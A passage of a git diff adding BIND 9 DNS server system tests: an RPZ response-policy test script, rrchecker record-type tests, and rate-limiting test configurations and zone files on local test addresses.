${CONTROLPORT} -s" + +# $1 = test name (such as 1a, 1b, etc. for which named.$1.conf exists) +run_server() { + TESTNAME=$1 + + echo_i "stopping resolver" + stop_server --use-rndc --port ${CONTROLPORT} ns2 + + sleep 1 + + echo_i "starting resolver using named.$TESTNAME.conf" + cp -f ns2/named.$TESTNAME.conf ns2/named.conf + start_server --noclean --restart --port ${PORT} ns2 + sleep 3 +} + +run_query() { + TESTNAME=$1 + LINE=$2 + + NAME=`sed -n -e "$LINE,"'$p' ns2/$TESTNAME.queries | head -n 1` + $DIG $DIGOPTS $NAME a @10.53.0.2 -p ${PORT} -b 127.0.0.1 > dig.out.${t} + grep "status: SERVFAIL" dig.out.${t} > /dev/null 2>&1 && return 1 + return 0 +} + +# $1 = test name (such as 1a, 1b, etc. for which $1.queries exists) +# $2 = line number in query file to test (the name to query is taken from this line) +expect_norecurse() { + TESTNAME=$1 + LINE=$2 + + NAME=`sed -n -e "$LINE,"'$p' ns2/$TESTNAME.queries | head -n 1` + t=`expr $t + 1` + echo_i "testing $NAME doesn't recurse (${t})" + add_test_marker 10.53.0.2 + run_query $TESTNAME $LINE || { + echo_i "test ${t} failed" + status=1 + } +} + +# $1 = test name (such as 1a, 1b, etc. for which $1.queries exists) +# $2 = line number in query file to test (the name to query is taken from this line) +expect_recurse() { + TESTNAME=$1 + LINE=$2 + + NAME=`sed -n -e "$LINE,"'$p' ns2/$TESTNAME.queries | head -n 1` + t=`expr $t + 1` + echo_i "testing $NAME recurses (${t})" + add_test_marker 10.53.0.2 + run_query $TESTNAME $LINE && { + echo_i "test ${t} failed" + status=1 + } +} + +add_test_marker() { + for ns in $@ + do + $RNDCCMD $ns null ---- test ${t} ---- + done +} + +for mode in native dnsrps; do + status=0 + case $mode in + native) + if [ -e dnsrps-only ] ; then + echo_i "'dnsrps-only' found: skipping native RPZ sub-test" + continue + else + echo_i "running native RPZ sub-test" + fi + ;; + dnsrps) + if [ -e dnsrps-off ] ; then + echo_i "'dnsrps-off' found: skipping DNSRPS sub-test" + continue + fi + echo_i "attempting to configure servers with DNSRPS..." + stop_server --use-rndc --port ${CONTROLPORT} + $SHELL ./setup.sh -N -D $DEBUG + sed -n 's/^## //p' dnsrps.conf | cat_i + if grep '^#fail' dnsrps.conf >/dev/null; then + echo_i "exit status: 1" + exit 1 + fi + if grep '^#skip' dnsrps.conf > /dev/null; then + echo_i "DNSRPS sub-test skipped" + continue + else + echo_i "running DNSRPS sub-test" + start_server --noclean --restart --port ${PORT} + sleep 3 + fi + ;; + esac + + # show whether and why DNSRPS is enabled or disabled + sed -n 's/^## //p' dnsrps.conf | cat_i + + t=`expr $t + 1` + echo_i "testing that l1.l0 exists without RPZ (${t})" + add_test_marker 10.53.0.2 + $DIG $DIGOPTS l1.l0 ns @10.53.0.2 -p ${PORT} > dig.out.${t} + grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test ${t} failed" + status=1 + } + + t=`expr $t + 1` + echo_i "testing that l2.l1.l0 returns SERVFAIL without RPZ (${t})" + add_test_marker 10.53.0.2 + $DIG $DIGOPTS l2.l1.l0 ns @10.53.0.2 -p ${PORT} > dig.out.${t} + grep "status: SERVFAIL" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test ${t} failed" + status=1 + } + + # Group 1 + run_server 1a + expect_norecurse 1a 1 + run_server 1b + expect_norecurse 1b 1 + expect_recurse 1b 2 + run_server 1c + expect_norecurse 1c 1 + + # Group 2 + run_server 2a + for n in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 \ + 21 22 23 24 25 26 27 28 29 30 31 32 + do + expect_norecurse 2a $n + done + expect_recurse 2a 33 + + # Group 3 + run_server 3a + expect_recurse 3a 1 + run_server 3b + expect_recurse 3b 1 + run_server 3c + expect_recurse 3c 1 + run_server 3d + expect_norecurse 3d 1 + expect_recurse 3d 2 + run_server 3e + expect_norecurse 3e 1 + expect_recurse 3e 2 + run_server 3f + expect_norecurse 3f 1 + expect_recurse 3f 2 + + # Group 4 + testlist="aa ap bf" + values="1 16 32" + # Uncomment the following to test every skip value instead of + # only a sample of values + # + #testlist="aa ab ac ad ae af ag ah ai aj ak al am an ao ap \ + # aq ar as at au av aw ax ay az ba bb bc bd be bf" + #values="1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 \ + # 21 22 23 24 25 26 27 28 29 30 31 32" + set -- $values + for n in $testlist; do + run_server 4$n + ni=$1 + t=`expr $t + 1` + echo_i "testing that ${ni} of 33 queries skip recursion (${t})" + add_test_marker 10.53.0.2 + c=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 \ + 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 + do + run_query 4$n $i + c=`expr $c + $?` + done + skipped=`expr 33 - $c` + if [ $skipped != $ni ]; then + echo_i "test $t failed (actual=$skipped, expected=$ni)" + status=1 + fi + shift + done + + # Group 5 + run_server 5a + expect_norecurse 5a 1 + expect_norecurse 5a 2 + expect_recurse 5a 3 + expect_recurse 5a 4 + expect_recurse 5a 5 + expect_recurse 5a 6 + + if [ ! "$CYGWIN" -o -n "$PSSUSPEND" ] + then + # Group 6 + echo_i "check recursive behavior consistency during policy update races" + run_server 6a + sleep 1 + t=`expr $t + 1` + echo_i "running dig to cache CNAME record (${t})" + add_test_marker 10.53.0.1 10.53.0.2 + $DIG $DIGOPTS @10.53.0.2 -p ${PORT} www.test.example.org CNAME > dig.out.${t} + sleep 1 + echo_i "suspending authority server" + PID=`cat ns1/named.pid` + if [ "$CYGWIN" ] + then + $PSSUSPEND $PID + else + $KILL -STOP $PID + fi + echo_i "adding an NSDNAME policy" + cp ns2/db.6a.00.policy.local ns2/saved.policy.local + cp ns2/db.6b.00.policy.local ns2/db.6a.00.policy.local + $RNDC -c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT} reload 6a.00.policy.local 2>&1 | sed 's/^/ns2 /' | cat_i + test -f dnsrpzd.pid && $KILL -USR1 `cat dnsrpzd.pid` + sleep 1 + t=`expr $t + 1` + echo_i "running dig to follow CNAME (blocks, so runs in the background) (${t})" + add_test_marker 10.53.0.2 + $DIG $DIGOPTS @10.53.0.2 -p ${PORT} www.test.example.org A +time=5 > dig.out.${t} & + sleep 1 + echo_i "removing the NSDNAME policy" + cp ns2/db.6c.00.policy.local ns2/db.6a.00.policy.local + $RNDC -c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT} reload 6a.00.policy.local 2>&1 | sed 's/^/ns2 /' | cat_i + test -f dnsrpzd.pid && $KILL -USR1 `cat dnsrpzd.pid` + sleep 1 + echo_i "resuming authority server" + PID=`cat ns1/named.pid` + if [ "$CYGWIN" ] + then + $PSSUSPEND -r $PID + else + $KILL -CONT $PID + fi + add_test_marker 10.53.0.1 + for n in 1 2 3 4 5 6 7 8 9 + do + sleep 1 + [ -s dig.out.${t} ] || continue + grep "status: .*," dig.out.${t} > /dev/null 2>&1 && break + done + grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test ${t} failed" + status=1 + } + + echo_i "check recursive behavior consistency during policy removal races" + cp ns2/saved.policy.local ns2/db.6a.00.policy.local + run_server 6a + sleep 1 + t=`expr $t + 1` + echo_i "running dig to cache CNAME record (${t})" + add_test_marker 10.53.0.1 10.53.0.2 + $DIG $DIGOPTS @10.53.0.2 -p ${PORT} www.test.example.org CNAME > dig.out.${t} + sleep 1 + echo_i "suspending authority server" + PID=`cat ns1/named.pid` + if [ "$CYGWIN" ] + then + $PSSUSPEND $PID + else + $KILL -STOP $PID + fi + echo_i "adding an NSDNAME policy" + cp ns2/db.6b.00.policy.local ns2/db.6a.00.policy.local + $RNDC -c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT} reload 6a.00.policy.local 2>&1 | sed 's/^/ns2 /' | cat_i + test -f dnsrpzd.pid && $KILL -USR1 `cat dnsrpzd.pid` + sleep 1 + t=`expr $t + 1` + echo_i "running dig to follow CNAME (blocks, so runs in the background) (${t})" + add_test_marker 10.53.0.2 + $DIG $DIGOPTS @10.53.0.2 -p ${PORT} www.test.example.org A +time=5 > dig.out.${t} & + sleep 1 + echo_i "removing the policy zone" + cp ns2/named.default.conf ns2/named.conf + rndc_reconfig ns2 10.53.0.2 + test -f dnsrpzd.pid && $KILL -USR1 `cat dnsrpzd.pid` + sleep 1 + echo_i "resuming authority server" + PID=`cat ns1/named.pid` + if [ "$CYGWIN" ] + then + $PSSUSPEND -r $PID + else + $KILL -CONT $PID + fi + add_test_marker 10.53.0.1 + for n in 1 2 3 4 5 6 7 8 9; do + sleep 1 + [ -s dig.out.${t} ] || continue + grep "status: .*," dig.out.${t} > /dev/null 2>&1 && break + done + grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test ${t} failed" + status=1 + } + fi + + # Check maximum number of RPZ zones (64) + t=`expr $t + 1` + echo_i "testing maximum number of RPZ zones (${t})" + add_test_marker 10.53.0.2 + run_server max + i=1 + while test $i -le 64 + do + $DIG $DIGOPTS name$i a @10.53.0.2 -p ${PORT} -b 10.53.0.1 > dig.out.${t}.${i} + grep "^name$i.[ ]*[0-9]*[ ]*IN[ ]*A[ ]*10.53.0.$i" dig.out.${t}.${i} > /dev/null 2>&1 || { + echo_i "test $t failed: didn't get expected answer from policy zone $i" + status=1 + } + i=`expr $i + 1` + done + + # Check CLIENT-IP behavior + t=`expr $t + 1` + echo_i "testing CLIENT-IP behavior (${t})" + add_test_marker 10.53.0.2 + run_server clientip + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.4 > dig.out.${t} + grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + grep "^l2.l1.l0.[ ]*[0-9]*[ ]*IN[ ]*A[ ]*10.53.0.2" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test $t failed: didn't get expected answer" + status=1 + } + + # Check CLIENT-IP behavior #2 + t=`expr $t + 1` + echo_i "testing CLIENT-IP behavior #2 (${t})" + add_test_marker 10.53.0.2 + run_server clientip2 + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.1 > dig.out.${t}.1 + grep "status: SERVFAIL" dig.out.${t}.1 > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.2 > dig.out.${t}.2 + grep "status: NXDOMAIN" dig.out.${t}.2 > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.3 > dig.out.${t}.3 + grep "status: NOERROR" dig.out.${t}.3 > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + grep "^l2.l1.l0.[ ]*[0-9]*[ ]*IN[ ]*A[ ]*10.53.0.1" dig.out.${t}.3 > /dev/null 2>&1 || { + echo_i "test $t failed: didn't get expected answer" + status=1 + } + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.4 > dig.out.${t}.4 + grep "status: SERVFAIL" dig.out.${t}.4 > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + + # Check RPZ log clause + t=`expr $t + 1` + echo_i "testing RPZ log clause (${t})" + add_test_marker 10.53.0.2 + run_server log + cur=`awk 'BEGIN {l=0} /^/ {l++} END { print l }' ns2/named.run` + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.4 > dig.out.${t} + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.3 >> dig.out.${t} + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.2 >> dig.out.${t} + sed -n "$cur,"'$p' < ns2/named.run | grep "view recursive: rpz CLIENT-IP Local-Data rewrite l2.l1.l0/A/IN via 32.4.0.53.10.rpz-client-ip.log1" > /dev/null && { + echo_ic "failed: unexpected rewrite message for policy zone log1 was logged" + status=1 + } + sed -n "$cur,"'$p' < ns2/named.run | grep "view recursive: rpz CLIENT-IP Local-Data rewrite l2.l1.l0/A/IN via 32.3.0.53.10.rpz-client-ip.log2" > /dev/null || { + echo_ic "failed: expected rewrite message for policy zone log2 was not logged" + status=1 + } + sed -n "$cur,"'$p' < ns2/named.run | grep "view recursive: rpz CLIENT-IP Local-Data rewrite l2.l1.l0/A/IN via 32.2.0.53.10.rpz-client-ip.log3" > /dev/null || { + echo_ic "failed: expected rewrite message for policy zone log3 was not logged" + status=1 + } + + # Check wildcard behavior + + t=`expr $t + 1` + echo_i "testing wildcard behavior with 1 RPZ zone (${t})" + add_test_marker 10.53.0.2 + run_server wildcard1 + $DIG $DIGOPTS www.test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.1 + grep "status: NXDOMAIN" dig.out.${t}.1 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + $DIG $DIGOPTS test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.2 + grep "status: NXDOMAIN" dig.out.${t}.2 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + + t=`expr $t + 1` + echo_i "testing wildcard behavior with 2 RPZ zones (${t})" + add_test_marker 10.53.0.2 + run_server wildcard2 + $DIG $DIGOPTS www.test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.1 + grep "status: NXDOMAIN" dig.out.${t}.1 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + $DIG $DIGOPTS test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.2 + grep "status: NXDOMAIN" dig.out.${t}.2 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + + t=`expr $t + 1` + echo_i "testing wildcard behavior with 1 RPZ zone and no non-wildcard triggers (${t})" + add_test_marker 10.53.0.2 + run_server wildcard3 + $DIG $DIGOPTS www.test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.1 + grep "status: NXDOMAIN" dig.out.${t}.1 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + $DIG $DIGOPTS test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.2 + grep "status: NOERROR" dig.out.${t}.2 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + + # Check for invalid prefix length error + t=`expr $t + 1` + echo_i "testing for invalid prefix length error (${t})" + add_test_marker 10.53.0.2 + run_server invalidprefixlength + grep "invalid rpz IP address \"1000.4.0.53.10.rpz-client-ip.invalidprefixlength\"; invalid prefix length of 1000$" ns2/named.run > /dev/null || { + echo_ic "failed: expected that invalid prefix length error would be logged" + status=1 + } + + t=`expr $t + 1` + echo_i "testing wildcard passthru before explicit drop (${t})" + add_test_marker 10.53.0.2 + run_server wildcard4 + $DIG $DIGOPTS example.com a @10.53.0.2 -p ${PORT} > dig.out.${t}.1 + grep "status: NOERROR" dig.out.${t}.1 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + $DIG $DIGOPTS www.example.com a @10.53.0.2 -p ${PORT} > dig.out.${t}.2 + grep "status: NOERROR" dig.out.${t}.2 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + + t=`expr $t + 1` + echo_i "checking 'nsip-wait-recurse no' is faster than 'nsip-wait-recurse yes' ($t)" + add_test_marker 10.53.0.2 10.53.0.3 + echo_i "timing 'nsip-wait-recurse yes' (default)" + ret=0 + t1=`$PERL -e 'print time()."\n";'` + $DIG -p ${PORT} @10.53.0.3 foo.child.example.tld a > dig.out.yes.$t + t2=`$PERL -e 'print time()."\n";'` + p1=`expr $t2 - $t1` + echo_i "elasped time $p1 seconds" + + $RNDC -c ../common/rndc.conf -s 10.53.0.3 -p ${CONTROLPORT} flush + copy_setports ns3/named2.conf.in ns3/named.conf + nextpart ns3/named.run > /dev/null + $RNDC -c ../common/rndc.conf -s 10.53.0.3 -p ${CONTROLPORT} reload > /dev/null + wait_for_log 20 "rpz: policy: reload done" ns3/named.run || ret=1 + + echo_i "timing 'nsip-wait-recurse no'" + t3=`$PERL -e 'print time()."\n";'` + $DIG -p ${PORT} @10.53.0.3 foo.child.example.tld a > dig.out.no.$t + t4=`$PERL -e 'print time()."\n";'` + p2=`expr $t4 - $t3` + echo_i "elasped time $p2 seconds" + + if test $p1 -le $p2; then ret=1; fi + if test $ret != 0; then echo_i "failed"; fi + status=`expr $status + $ret` + + [ $status -ne 0 ] && pf=fail || pf=pass + case $mode in + native) + native=$status + echo_i "status (native RPZ sub-test): $status ($pf)";; + dnsrps) + dnsrps=$status + echo_i "status (DNSRPS sub-test): $status ($pf)";; + *) echo_i "invalid test mode";; + esac +done +status=`expr ${native:-0} + ${dnsrps:-0}` + +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rrchecker/classlist.good b/bin/tests/system/rrchecker/classlist.good new file mode 100644 index 0000000..f0fff1a --- /dev/null +++ b/bin/tests/system/rrchecker/classlist.good @@ -0,0 +1,3 @@ +IN +CH +HS diff --git a/bin/tests/system/rrchecker/clean.sh b/bin/tests/system/rrchecker/clean.sh new file mode 100644 index 0000000..166247d --- /dev/null +++ b/bin/tests/system/rrchecker/clean.sh @@ -0,0 +1,15 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f classlist.out privatelist.out typelist.out tempzone checkzone.out* checker.out +rm -f ns*/named.lock diff --git a/bin/tests/system/rrchecker/privatelist.good b/bin/tests/system/rrchecker/privatelist.good new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/rrchecker/privatelist.good diff --git a/bin/tests/system/rrchecker/tests.sh b/bin/tests/system/rrchecker/tests.sh new file mode 100644 index 0000000..7990e65 --- /dev/null +++ b/bin/tests/system/rrchecker/tests.sh @@ -0,0 +1,84 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "class list ($n)" +$RRCHECKER -C > classlist.out +$DIFF classlist.out classlist.good || { echo_i "failed"; status=`expr $status + 1`; } + +n=`expr $n + 1` +echo_i "type list ($n)" +$RRCHECKER -T > typelist.out +$DIFF typelist.out typelist.good || { echo_i "failed"; status=`expr $status + 1`; } + +n=`expr $n + 1` +echo_i "private type list ($n)" +$RRCHECKER -P > privatelist.out +$DIFF privatelist.out privatelist.good || { echo_i "failed"; status=`expr $status + 1`; } + +myecho() { +cat << EOF +$* +EOF +} + +n=`expr $n + 1` +echo_i "check conversions to canonical format ($n)" +ret=0 +$SHELL ../genzone.sh 0 > tempzone +$CHECKZONE -Dq . tempzone | sed '/^;/d' > checkzone.out$n +while read -r name tt cl ty rest +do + myecho "$cl $ty $rest" | $RRCHECKER -p > checker.out || { + ret=1 + echo_i "'$cl $ty $rest' not handled." + } + read -r cl0 ty0 rest0 < checker.out + test "$cl $ty $rest" = "$cl0 $ty0 $rest0" || { + ret=1 + echo_i "'$cl $ty $rest' != '$cl0 $ty0 $rest0'" + } +done < checkzone.out$n +test $ret -eq 0 || { echo_i "failed"; status=`expr $status + 1`; } + +n=`expr $n + 1` +echo_i "check conversions to and from unknown record format ($n)" +ret=0 +$CHECKZONE -Dq . tempzone | sed '/^;/d' > checkzone.out$n +while read -r name tt cl ty rest +do + myecho "$cl $ty $rest" | $RRCHECKER -u > checker.out || { + ret=1 + echo_i "'$cl $ty $rest' not converted to unknown record format" + } + read -r clu tyu restu < checker.out + myecho "$clu $tyu $restu" | $RRCHECKER -p > checker.out || { + ret=1 + echo_i "'$cl $ty $rest' not converted back to canonical format" + } + read -r cl0 ty0 rest0 < checker.out + test "$cl $ty $rest" = "$cl0 $ty0 $rest0" || { + ret=1 + echo_i "'$cl $ty $rest' != '$cl0 $ty0 $rest0'" + } +done < checkzone.out$n +test $ret -eq 0 || { echo_i "failed"; status=`expr $status + 1`; } + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rrchecker/typelist.good b/bin/tests/system/rrchecker/typelist.good new file mode 100644 index 0000000..3c3e5cd --- /dev/null +++ b/bin/tests/system/rrchecker/typelist.good @@ -0,0 +1,81 @@ +A +NS +MD +MF +CNAME +SOA +MB +MG +MR +NULL +WKS +PTR +HINFO +MINFO +MX +TXT +RP +AFSDB +X25 +ISDN +RT +NSAP +NSAP-PTR +SIG +KEY +PX +GPOS +AAAA +LOC +NXT +EID +NIMLOC +SRV +ATMA +NAPTR +KX +CERT +A6 +DNAME +SINK +APL +DS +SSHFP +IPSECKEY +RRSIG +NSEC +DNSKEY +DHCID +NSEC3 +NSEC3PARAM +TLSA +SMIMEA +HIP +NINFO +RKEY +TALINK +CDS +CDNSKEY +OPENPGPKEY +CSYNC +ZONEMD +SVCB +HTTPS +SPF +UINFO +UID +GID +UNSPEC +NID +L32 +L64 +LP +EUI48 +EUI64 +URI +CAA +AVC +DOA +AMTRELAY +TA +DLV diff --git a/bin/tests/system/rrl/broken.conf.in b/bin/tests/system/rrl/broken.conf.in new file mode 100644 index 0000000..020542c --- /dev/null +++ b/bin/tests/system/rrl/broken.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + statistics-file "named.stats"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + notify no; + + rate-limit { + responses-per-second 2; + all-per-second 50; + slip 3; + exempt-clients { 10.53.0.7; }; + log-only yes; + + min-table-size 0; + max-table-size 0; + }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + diff --git a/bin/tests/system/rrl/clean.sh b/bin/tests/system/rrl/clean.sh new file mode 100644 index 0000000..739366a --- /dev/null +++ b/bin/tests/system/rrl/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Clean up after rrl tests. + +rm -f dig.out* *mdig.out* +rm -f */named.memstats */named.run */named.stats */log-* */session.key +rm -f ns3/bl*.db */*.jnl */*.core */*.pid +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f broken.conf +rm -f broken.out +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/rrl/ns1/named.conf.in b/bin/tests/system/rrl/ns1/named.conf.in new file mode 100644 index 0000000..e4da6ef --- /dev/null +++ b/bin/tests/system/rrl/ns1/named.conf.in @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + recursion yes; + dnssec-validation yes; +}; + +zone "." {type primary; file "root.db";}; diff --git a/bin/tests/system/rrl/ns1/root.db b/bin/tests/system/rrl/ns1/root.db new file mode 100644 index 0000000..68265fe --- /dev/null +++ b/bin/tests/system/rrl/ns1/root.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns. hostmaster.ns. ( 1 3600 1200 604800 60 ) +@ NS ns. +ns. A 10.53.0.1 +. A 10.53.0.1 + +; limit responses from here +tld2. NS ns.tld2. +ns.tld2. A 10.53.0.2 + +; limit recursion to here +tld3. NS ns.tld3. +ns.tld3. A 10.53.0.3 + +; generate SERVFAIL +tld4. NS ns.tld3. diff --git a/bin/tests/system/rrl/ns2/hints b/bin/tests/system/rrl/ns2/hints new file mode 100644 index 0000000..a1d435e --- /dev/null +++ b/bin/tests/system/rrl/ns2/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 0 NS ns1. +ns1. 0 A 10.53.0.1 diff --git a/bin/tests/system/rrl/ns2/named.conf.in b/bin/tests/system/rrl/ns2/named.conf.in new file mode 100644 index 0000000..987d42f --- /dev/null +++ b/bin/tests/system/rrl/ns2/named.conf.in @@ -0,0 +1,65 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + statistics-file "named.stats"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + notify no; + recursion yes; + dnssec-validation yes; + + rate-limit { + responses-per-second 2; + all-per-second 50; + slip 3; + exempt-clients { 10.53.0.7; }; + + // small enough to force a table expansion + min-table-size 75; + }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* + * These log settings have no effect unless "-g" is removed from ../../start.pl + */ +logging { + channel debug { + file "log-debug"; + print-category yes; print-severity yes; severity debug 10; + }; + channel queries { + file "log-queries"; + print-category yes; print-severity yes; severity info; + }; + category rate-limit { debug; queries; }; + category queries { debug; queries; }; +}; + +zone "." { type hint; file "hints"; }; + +zone "tld2."{ type primary; file "tld2.db"; }; diff --git a/bin/tests/system/rrl/ns2/tld2.db b/bin/tests/system/rrl/ns2/tld2.db new file mode 100644 index 0000000..a1a832b --- /dev/null +++ b/bin/tests/system/rrl/ns2/tld2.db @@ -0,0 +1,42 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; rate limit response from this zone + +$TTL 120 +@ SOA tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 ) + NS ns + NS . +ns A 10.53.0.2 + +; basic rate limiting +a1 A 192.0.2.1 + +; wildcards +*.a2 A 192.0.2.2 + +; a3 is in tld3 + +; a4 does not exist to give NXDOMAIN + +; a5 for TCP requests +a5 A 192.0.2.5 + +; a6 for whitelisted clients +a6 A 192.0.2.6 + +; a7 for SERVFAIL + +; a8 for NODATA +a8 A 192.0.2.8 + +; a9 for all-per-second limit +$GENERATE 101-180 all$.a9 A 192.0.2.8 diff --git a/bin/tests/system/rrl/ns3/hints b/bin/tests/system/rrl/ns3/hints new file mode 100644 index 0000000..a1d435e --- /dev/null +++ b/bin/tests/system/rrl/ns3/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 0 NS ns1. +ns1. 0 A 10.53.0.1 diff --git a/bin/tests/system/rrl/ns3/named.conf.in b/bin/tests/system/rrl/ns3/named.conf.in new file mode 100644 index 0000000..8807f44 --- /dev/null +++ 